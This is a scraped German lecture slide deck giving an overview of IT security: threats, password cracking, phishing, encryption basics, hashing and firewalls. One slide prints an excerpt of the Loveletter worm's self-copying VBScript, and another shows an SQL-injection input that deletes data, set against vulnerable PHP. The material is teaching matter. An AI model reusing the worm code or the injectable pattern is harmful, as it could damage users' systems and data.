IT Sicherheit Ein Überblick.

Slides:



Advertisements
Ähnliche Präsentationen
Developing your Business to Success We are looking for business partners. Enterprise Content Management with OS|ECM Version 6.
Advertisements

IT Sicherheit Ein Überblick.
Vorlesung: 1 Betriebliche Informationssysteme 2003 Prof. Dr. G. Hellberg Studiengang Informatik FHDW Vorlesung: Betriebliche Informationssysteme Teil3.
Einführung in die Informatik: Programmierung und Software-Entwicklung
LS 2 / Informatik Datenstrukturen, Algorithmen und Programmierung 2 (DAP2)
Sicherheit von Wireless LANs
Herzlich Willkommen zum Informations-Forum: SAP Interoperabilität
Telefonnummer.
CPCP Institute of Clinical Pharmacology AGAH Annual Meeting, 29. Februar 2004, Berlin, Praktischer Umgang mit den Genehmigungsanträgen gemäß 12. AMG Novelle.
Dr. M. Schlottke Common Description of Web Services Source: P. Gerbert, 2002 Web Services allow to establish B2B e-commerce on the fly Web Services allow.
Modelle und Methoden der Linearen und Nichtlinearen Optimierung (Ausgewählte Methoden und Fallstudien) U N I V E R S I T Ä T H A M B U R G November 2011.
Modelle und Methoden der Linearen und Nichtlinearen Optimierung (Ausgewählte Methoden und Fallstudien) U N I V E R S I T Ä T H A M B U R G November 2011.
1 JIM-Studie 2010 Jugend, Information, (Multi-)Media Landesanstalt für Kommunikation Baden-Württemberg (LFK) Landeszentrale für Medien und Kommunikation.
Personalisierte Benutzeroberflächen BFD WS 12/13 Übung 6 Producing an end-user experience that is uniquely appropriate for each individual. [Sears]
Telling Time in German Deutsch 1 Part 1 Time in German There are two ways to tell time in German. There are two ways to tell time in German. Standard.
= = = = 47 = 47 = 48 = =
Internet facts 2008-II Graphiken zu dem Berichtsband AGOF e.V. September 2008.
PL/SQL - Programmierung von Programmeinheiten. © Prof. T. Kudraß, HTWK Leipzig Gespeicherte Prozeduren – Eine Prozedur ist ein benannter PL/SQL Block,
Vorlesung: 1 Betriebliche Informationssysteme 2003 Prof. Dr. G. Hellberg Studiengang Informatik FHDW Vorlesung: Betriebliche Informationssysteme Teil2.
PKJ 2005/1 Stefan Dissmann Zusammenfassung Bisher im Kurs erarbeitete Konzepte(1): Umgang mit einfachen Datentypen Umgang mit Feldern Umgang mit Referenzen.
Prof. Dr. Bernhard Wasmayr
Studienverlauf im Ausländerstudium
©2005 Check Point Software Technologies Ltd. Proprietary & Confidential Check Point Endpoint Security Lösung Total Access Protection.
Tipps zur besseren Sicherheit 1.WEP (Wired equivalent Protection); 128 Bit 2.Änderung der voreingestellten SSID(ServiceSetIdentifier) 3.SSID soll nicht.
Prof. Dr. Bernhard Wasmayr VWL 2. Semester
01 Installation / Support. © beas group 2011 / Page 2 This documentation and training is provided to you by beas group AG. The documents are neither approved.
1. 2 Schreibprojekt Zeitung 3 Überblick 1. Vorstellung ComputerLernWerkstatt 2. Schreibprojekt: Zeitung 2.1 Konzeption des Kurses 2.2 Projektverlauf.
20:00.
Die Geschichte von Rudi
Zusatzfolien zu B-Bäumen
| 6 | Produktive ZDB-Schnittstellen: Z39.50 | 14. Oktober Produktive ZDB-Schnittstellen: Z39.50 Information Retrieval *z3950.dnb.de:210/zdb* Martina.
Passive Angriffe ... nicht-invasiv.
Eine Einführung in die CD-ROM
GBI Genios Wiso wiso bietet Ihnen das umfassendste Angebot deutsch- und englischsprachiger Literatur für die Wirtschafts- und Sozialwissenschaften. Wir.
© All rights reserved. Zend Technologies, Inc. Jan Burkl System Engineer, Zend Technologies Zend Server im Cluster.
1 Ein kurzer Sprung in die tiefe Vergangenheit der Erde.
The free XML Editor for Windows COOKTOP Semistrukturierte Daten 1 Vortrag Semistrukturierte Daten 1 COOKTOP The free XML-Editor for Windows
Your name Bedeutung von Internet- Technologien Gruppe 1 Andreas Feuerstein Philipp Hochratner Christian Weinzinger.
Jan Hentschel Microsoft Expert Student Partner Windows Azure Windows Azure Windows Azure Mobile Services.
Frank Fischer + Bernhard Frank Microsoft Deutschland GmbH.
Template v5 October 12, Copyright © Infor. All Rights Reserved.
Cyber-Security und Datenschutz in der Cloud Wie passt das zusammen?
Staatsballett Berlin Ein Verbesserungskonzept für den Social- Media Auftritt Your picture here.
PROCAM Score Alter (Jahre)
Ein Projekt des Technischen Jugendfreizeit- und Bildungsvereins (tjfbv) e.V. kommunizieren.de Blended Learning for people with disabilities.
Ertragsteuern, 5. Auflage Christiana Djanani, Gernot Brähler, Christian Lösel, Andreas Krenzin © UVK Verlagsgesellschaft mbH, Konstanz und München 2012.
Symmetrische Blockchiffren DES – der Data Encryption Standard
Digital Dashboard Toolkit 2001 SharePoint Portal Server released targeting portal market SharePoint Team Services (STS) released as free add-
Windows Azure VMs und Storage
By: Jade Bowerman. German numbers are quite a bit like our own. You start with one through ten and then you add 20, 30, 40 or 50 to them. For time you.
MINDREADER Ein magisch - interaktives Erlebnis mit ENZO PAOLO
1 (C)2006, Hermann Knoll, HTW Chur, FHO Quadratische Reste Definitionen: Quadratischer Rest Quadratwurzel Anwendungen.
Schutzvermerk nach DIN 34 beachten 20/05/14 Seite 1 Grundlagen XSoft Lösung :Logische Grundschaltung IEC-Grundlagen und logische Verknüpfungen.
Folie Beispiel für eine Einzelauswertung der Gemeindedaten (fiktive Daten)
Launch ON Global.vi System ID object name classname Services to suscribe Observer Control Ref vi-path Service name Step 1 : Objects register to the Global.vi´s,
EN/FAD Ericsson GmbH EDD/ Information im 21. Jahrundert muss Erwünscht Relevant Erreichbar Schnell Kostenlos!?
1 Mathematical Programming Nichtlineare Programmierung.
Technische Frage Technische Frage Bitte löse die folgende Gleichung:
Ertragsteuern, 5. Auflage Christiana Djanani, Gernot Brähler, Christian Lösel, Andreas Krenzin © UVK Verlagsgesellschaft mbH, Konstanz und München 2012.
Sichere Datenübertragung in der Cloud
Bildergalerie PRESEASON CAMP Juni 2014 Romanshorn Get ready for the Season!
Folie Einzelauswertung der Gemeindedaten
1 10 pt 15 pt 20 pt 25 pt 5 pt 10 pt 15 pt 20 pt 25 pt 5 pt 10 pt 15 pt 20 pt 25 pt 5 pt 10 pt 15 pt 20 pt 25 pt 5 pt 10 pt 15 pt 20 pt 25 pt 5 pt Modalverben.
Numbers Greetings and Good-byes All about Me Verbs and Pronouns
prof. dr. dieter steinmannfachhochschule trier © prof. dr. dieter steinmann Folie 1 vom Montag, 30. März 2015.
Datum:17. Dezember 2014 Thema:IFRS Update zum Jahresende – die Neuerungen im Überblick Referent:Eberhard Grötzner, EMA ® Anlass:12. Arbeitskreis Internationale.
1 10 pt 15 pt 20 pt 25 pt 5 pt 10 pt 15 pt 20 pt 25 pt 5 pt 10 pt 15 pt 20 pt 25 pt 5 pt 10 pt 15 pt 20 pt 25 pt 5 pt 10 pt 15 pt 20 pt 25 pt 5 pt Wie.
Registrar-Tag Andreas Papst.at nameservice Wer fragt Wen Was Wann? Datum:
1 Medienpädagogischer Forschungsverbund Südwest KIM-Studie 2014 Landesanstalt für Kommunikation Baden-Württemberg (LFK) Landeszentrale für Medien und Kommunikation.
Monatsbericht Ausgleichsenergiemarkt Gas – Oktober
 Präsentation transkript:

IT Sicherheit Ein Überblick

Zahlen ... Quelle: CERT® Coordination Center, Software Engineering Institute, Carnegie Mellon University http://www.cert.org/stats/, June 2005

Internetkriminalität Quelle: Bundeskriminalamt 2004 http://www.bka.de

Potentielle Risiken (Auswahl) Beispiele für Lösungen Inhalt Überblick Potentielle Risiken (Auswahl) Beispiele für Lösungen Authentisierung Wer greift auf Daten/Systeme zu ? Verschlüsselung Daten vertraulich halten Firewall Netze gegen Angreifer schützen Was tun ?

Datensicherheit: DIN 44300, Teil 1. Schutz von Daten gegen Beeinträchtigung (Verlust, Zerstörung, Änderung) und vor Mißbrauch Datenschutz: Schutz von Personen vor Beeinträchtigungen durch Verarbeitung von Daten Betrug (Nicht-) Verfügbarkeit Sabotage Spionage

Sicherheitskriterien Beispiele für Risiken Integrität Konsistenz Korrektheit Sabotage Viren Schaden weltweit 2003: 50 Milliarden $ ??? Spionage Vertraulichkeit Zugriff nur durch berechtigte Personen Hacker Betrug Verbindlichkeit Authentisierung von Nutzern Persistenz fake orders spoofing Nicht- Verfügbarkeit Verfügbarkeit Zugriff jederzeit möglich DoS, DDoS, mail flooding

Loveletter: Liebe macht blind .... @ MS Outlook MS Outlook @

Loveletter Quelltext (Auszug) rem barok -loveletter(vbe) <i hate go to school> rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq="" ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") ....

Aktuelle Viren Intervall zwischen Entdeckungn und Schutz durch Anti-Viren Software !

SQL-Injection. Maier File index.htm Maier; delete from address ... <form method="post" action="db-request.php"> <input type="text" name="sstring"> <input type="submit" name="search" value="search"> </form> File index.htm Maier; delete from address ... $selstring = "SELECT * FROM Address WHERE name=$sstring'"; $conn = pg_Connect("localhost", "5432","","","somedb"); $result = pg_Exec($conn, $selstring); File db-request.php

Distributed Denial-of-Service Attack (DDoS). Probleme: Unterschied zwischen echten und falschen Anfragen Verteilte Netzwerk-Infrastruktur victim slave installing a demon Angriff Intrusion Detection Systems http://www.iss.net master Hack Angreifer

Wardriving, LAN jacking

Gegenmaßnahmen Virenscanner Pasßwort Biometrie Backup Verfügbarkeit Verbindlichkeit Vertraulichkeit Integrität Managed Security Services Virenscanner Pasßwort Biometrie Backup Zugangs- kontrolle Firewall Verschlüssel- ung, VPN Digitale Signaturen intrusion detection

Nötige Vorkenntnisse der Hacker Script Kiddies web worms Nötige Vorkenntnisse der Hacker complexity of hacker tools intrusion into not secured system source: c't 2/2002, S. 79 cracking of passwords viruses guessing of passwords

Beispiel: Unberechtigten Zugriff verhindern user identification Passwort, Biometrie, Authentisierungsverfahren Nutzerrechte Wer darf auf welche Resourcen zugreifen Zugriffskontrolle firewall, Intrusion Detection Systeme Verschlüsselung Zugriff auf Daten bleibt zwar möglich, diese sind aber nutzlos

Password cracking. Brute force hack Dictionary hack Spionage Ausprobieren aller Buchstabenkombinationen Dictionary hack Systematisches Ausprobieren von häufiger verwendeten Wörtern (aus Worllisten) Hybride Verfahren: Kombination von Wörterbuch und Ausprobieren von Buchstanben/Zahlen Spionage Blick über die Schulter Trojanische Pferde, key logger Social Engineering Ausnutzen der Naivität von Anwendern Z.B. fake mail an Angestellte mit sender spoofing ("IT security dept.") zur Abfrage von Kennwörtern Studie von BBC News zeigte, daß 92% der Teilnehmer bereit waren, persönliche Angaben wie etwa Geburtsname der Mutter, Grundschule,... Zu verraten (Comm. ACM Vol. 48/6 p. 10)

Default Kennwörter

Ziemlich einfach ...

Social Engineering. Original und Fälschung

Beispiel Telekom Phishing mail

Biometrie

eTokens. http://www.aks.com/

Verschlüsselung Problem Datenübertragung über öffentliche Netze ist öffentlich ! (insbesondere bei Funknetzen) Lösung Private Netze (teuer) oder Verschlüsselung: Der Absender wendet (mathematische) Funktion auf die Daten an, die nur (!) vom Empfänger rückgängig gemacht werden kann Absender: E = e(K,M) : K = key, M = message Empfänger: M = d(K,E) : E = encrypted message, Funktioniert, wenn M = d(K,e(K,M))

Substitutionsschlüssel Einfache Verschlüsselungstechnik: Jedes Zeichen wird durch ein anderes ersetzt Das Transformationsschema ist der Schlüssel: Originalalphabet: abcdefghijklmnopqrstuvwxyz Schlüssel: qfwgxbdkpjhyzstiarnouvcelm Verschlüsselter Text: q wkpbbrx kqn ot xsnurx xauqy irtfqfpypopxn btr qyy wkqrqwoxrn ot irxvxso npziyx brxauxswl fqnxg qsqylnpn q npziyx nufnopouopts pn sto nubbpwpxso qslftgl cpok q fpo tb opzx tr q wtziuoxr wqs frxqh nuwk wtgxn xqnpyl okxnx wtgxn cxrx unxg usopy okx spsxoxxsok wxsourl qsg cxrx rxiyqwxg fl wtgxn okqo wkqsdx okx nufnopouopts iqooxrs cpok xqwk wkqrqwoxr

Relative Häufigkeit der einzelnen Buchstaben Kryptoanalyse Relative Häufigkeit der einzelnen Buchstaben Im verschlüsselten Text In (englischem) Text a 0.006 b 0.020 c 0.011 d 0.003 e 0.000 f 0.026 g 0.023 h 0.003 i 0.020 j 0.000 k 0.040 l 0.020 m 0.000 n 0.062 o 0.085 p 0.060 q 0.071 r 0.051 s 0.051 t 0.040 u 0.037 v 0.003 w 0.048 x 0.114 y 0.028 z 0.011 a 0.096 b 0.015 c 0.038 d 0.039 e 0.114 f 0.020 g 0.013 h 0.035 i 0.071 j 0.002 k 0.003 l 0.047 m 0.030 n 0.065 o 0.082 p 0.034 q 0.001 r 0.061 s 0.067 t 0.095 u 0.028 v 0.008 w 0.016 x 0.005 y 0.012 z 0.002

Entschlüsselter Text a chiffre has to ensure equal probabilities for all characters to prevent simple frequency based analysis a simple substitution is not sufficient anybody with a bit of time or a computer can break such codes easily these codes were used until the nineteenth century and were replaced by codes that change the substitution pattern with each character Gedankenexperiment: Eine Nachricht ist genau ein Zeichen lang Ist hier Kryptoanalyse möglich ? Nein ! Wenn der Schlüssel (mindestens) die gleiche Länge hat, wie die Nachricht, kann sie nicht entschlüsselt werden ! „One time pad“

Enigma

Moderne Verschlüsselungsverfahren Kombination von Substitution und Transposition DES (alt), AES (neu) symmetrisch: Schlüssel für Sender und Empfänger gleich Problem: Wie übermittelt man den Schlüssel ? An viele Partner Lange Schlüssel (one time pad) Ungelöst ! asymmetrisch: unterschiedliche Schlüssel zum Ver- und Entschlüsseln Public/Private key Diskrete Mathematik: Faktorisierung großer Zahlen ist (extrem) rechenaufwändig Signatur: one way functions

unbeabsichtigte Änderungen Prüsummen Integrität unbeabsichtigte Änderungen Übertragungsfehler, Hardware,... Prüsummen beabsichtigte Änderungen Prüfsummen sind leicht zu fälschen krypthografische Verfahren

Beispiel: MD5 erzeugt aus einer beliebig langen Nachricht einen 128 Bit langen Wert Beispiel: Der Text Heute ist schönes Wetter ergibt den Hash a353cee72e0558710e2f89fb18841283a Empfänger berechnet ebenfalls den MD5 Hash der Nachricht und vergleicht mit dem übermittelten, Üereinstimmung --> Nachricht korrekt übermittelt Problem: Dritte Partei fängt die Nachricht ab und ersetzt sie durch eine andere (mit neuem, passenden hash) Löung: Der Absender verschlüsselt den hash-Wert mit seinem private key. Der Empfänger überprüft nach Entschlüsselung mit dem public key des Absenders.(Digitale Signatur)

Internet Firewall LAN Firewalls Eine Firewall ist ein zentraler Kontrollpunkt zwischen dem Internet und dem LAN LAN

Router Internet Router leitet IP-Pakete weiter, vom LAN ins Internet, vom Internet ins LAN Screening Router (Paketfilter) leitet nur Pakete weiter, die def. Regeln entsprechen (IP-Adressen, Ports usw.)

Personal firewall Computer Internet Personal Firewall Browser Eine personal firewall ist ein „eingebauter“ Paketfilter, der anwendungsbezogen filtert Die Sicherheit ist fragwürdig Oft kombiniert mit Viren-Scanner Mail client Application

Was wird gemacht ? 86 antivirus software 79 81 network firewalls 82 58 automatic backup 52 55 Virtual Private Networks (VPN) 71 29 personal firewalls 34 29 application irewalls 30 26 content filtering 37 Germany 26 USA Dial-Back- or secure modems 17 24 intrusion detection systems 43 source: IT-Security 2003; Juni-Juli, 2500 Interviews with CIOs; in Percent

Best practices. Einsatz einer application layer firewall. Automatische Updates der Virenschutz-Software auf Firewall, Servern und Clients Aktuelle Updates einspielen: Hackers nutzen oft bekannte Sicherheitslücken aus, um in Systeme einzubrechen Abschalten aller nicht benötigten Dienste Löschen aller nicht benötigten Programme Netzwerke nach backdoors, Trojanern und anderen Sicherheitslücken scannen, Intrusion Detection Systeme verwenden

Probleme bei „sicheren“ Systemen Die meisten (einfachen) Angriffe sind leicht abzublocken Wie hält man qualifizierte/motivierte Hacker auf ? Tradeoff: Sicherheit Usability Kosten Problem: Schlechte Usability kann Sicherheit verschlechtern: Restriktive Password policy --> schwer zu merken --> Nutzer schreiben Passwörter auf oder verwenden Standardpaßwort

„Clevere“ Lösungen..... Persönliche Fragen statt Kennwörtern „personal entropy“ „Name Ihres Haustiers ?“ Der Name von Paris Hiltons Hund ist Tinkerbell (Bunte o.ä.) Ihr T-Mobile Account wurde gehackt Nach mehrfacher Eingabe eines falschen Kennworts wird der login für bestimmte Zeit gesperrt Sie bieten auf einen Artikel bei ebay und wissen den Namen eines Mitbieters, versuchen sich mit seinem Namen und einem beliebigen Kennwort anzumelden --> sein Account wird geblockt --> Denial of Service attack Was wäre, wenn Geldautomaten den Fingerabdruck prüfen würden ? Vielleicht weniger Betrug ? Vielleicht mehr Raubüberfälle? (siehe Wegfahrsperre)

Auch die fortschrittlichste Technologie ....

Läßt sich umgehen, wenn man wirklich will ....

Man kann Angreifern nur das Leben schwerer machen

Es gibt keine absolute Sicherheit Wenn jemand behauptet, ein unknackbares System zu haben, ist er entweder naiv, oder er lügt ! Das schwächste Glied zählt SQL-Slammer took out 20% of ATM machines in US (costed banks tens of millions of dollars), Continental coudn’t fly for 12 hours, why ? Not the servers were vulnerable, but the network connections were overloaded. Designschwächen (Protokolle, Programmiersprachen,...) Wurden nicht für die heutigen Anwendungen konzipiert Lösungen wären bekannt, sind aber aufwendig: Direkter Zugriff auf den Stack bei vielen Programmiersprachen Buffer overflows könnten verhindert werden, ist aber mehr Arbeit SQL-injection könnte verhindert werden, ebenfalls mehr Arbeit Programmierfehler (bugs) ermöglichen exploits, Patches kommen immer zu spät („zero day exploits“) Fehlerfreie Software zu erstellen ist extrem schwer (unmöglich ?) Bessere Prozeße bei der SW-Entwicklung helfen, aber ...

Was ist „sicher genug“ Wieviel Sicherheit wird gebraucht ? Analyse der Risiken, Schäden usw. nötig Online Wettervorhersage vs. Online-banking Wieviel Sicherheit ist gewollt ? Usability Kosten Umgang mit Risiken technisch Organisatorisch (Schulungen,...) Keine Standardlösungen Security ist eine boomende Branche Communications of the ACM Vol 48/6 pp. 82

Fragen ?